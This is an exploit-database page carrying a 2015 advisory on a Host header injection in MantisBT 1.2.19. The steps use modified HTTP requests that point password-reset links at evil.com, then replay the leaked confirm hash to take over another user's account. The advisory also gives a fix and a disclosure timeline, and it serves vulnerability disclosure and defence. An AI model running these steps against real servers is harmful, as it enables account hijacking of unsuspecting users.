MantisBT 1.2.19 - Host header attack vulnerability

vendor:

MantisBT

by:

Pier-Luc Maltais

7,5

CVSS

HIGH

Host header attack

601

CWE

Product Name: MantisBT

Affected Version From: 1.2.19

Affected Version To: 1.2.19

Patch Exists: YES

Related CWE: N/A

CPE: a:mantisbt:mantisbt:1.2.19

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

MantisBT 1.2.19 – Host header attack vulnerability

MantisBT 1.2.19 is vulnerable to an Host header attack that can be exploited by an unauthenticated user to hijack another user account. This exploit use the Host header attack to poison the link in the password reset mail. You need to know the victim username and e-mail. You also need a remote host that you control to catch the verification hash needed for password reset.

Mitigation:

Ensure that the Host header is not used to determine the target of a request.

Source

Exploit-DB raw data:

# Exploit Title: MantisBT 1.2.19 - Host header attack vulnerability
# Date: 07-09-2015
# Exploit Author: Pier-Luc Maltais
				  Centre opérationnel de sécurité informatique gouvernemental (COSIG)
# Vendor Homepage: https://www.mantisbt.org/
# Software Link: http://sourceforge.net/projects/mantisbt/files/mantis-stable/
# Version: 1.2.19
# Contact: https://twitter.com/plmaltais
		   http://plmsecurity.net/mantis_host_header_attack

==========================
Vulnerability Description:
==========================

MantisBT 1.2.19 is vulnerable to an Host header attack that can
be exploited by an unauthenticated user to hijack another user account.
 
==================
Technical Details:
==================

This exploit use the Host header attack to poison the link in the
password reset mail. You need to know the victim username and 
e-mail. You also need a remote host that you control to catch the 
verification hash needed for password reset.

1.  Access the password reset feature and fill the form with the
    victim username and e-mail.

    http://{VULNERABLE_MANTIS}/mantisbt/lost_pwd_page.php

2.  Using an intercepting proxy like Burp, change the Host header 
    with your evil host.

    Original request :
    
    POST /mantisbt/lost_pwd_page.php HTTP/1.1
    Host : {VULNERABLE_MANTIS}
    [...]
    
    Modified request : 
    
    POST /mantisbt/lost_pwd_page.php HTTP/1.1
    Host : evil.com
    [...]
    
3.  When the user receive the e-mail, the link is poisoned with 
    the evil host.

    [...]
    visit the following URL to change your password: 
    http://evil.com/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead 
    [...]
    
4.  Now, when the victim click on the link to reset his password,
    his verification hash will be sent to our evil host. All we 
    have to do is access the verify.php page with his hash, so
    we can change his password and hijack his account.
    
    http://{VULNERABLE_MANTIS}/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead 
 
=========
Solution:
=========

Use 
$_SERVER['SERVER_NAME'] (server controlled) 
instead of 
$_SERVER['HTTP_HOST'] (client controlled)
 
====================
Disclosure Timeline:
====================

16/02/2015 - Found the vulnerability
17/02/2015 - Wrote this advisory
17/02/2015 - Contacted developers on MantisBT forum
18/02/2015 - Opened an issue in the bug tracker
01/09/2015 - Still not patched, releasing this advisory.
 
===========
References:
===========

[1] http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
[2] http://stackoverflow.com/questions/2297403/http-host-vs-server-name/2297421#2297421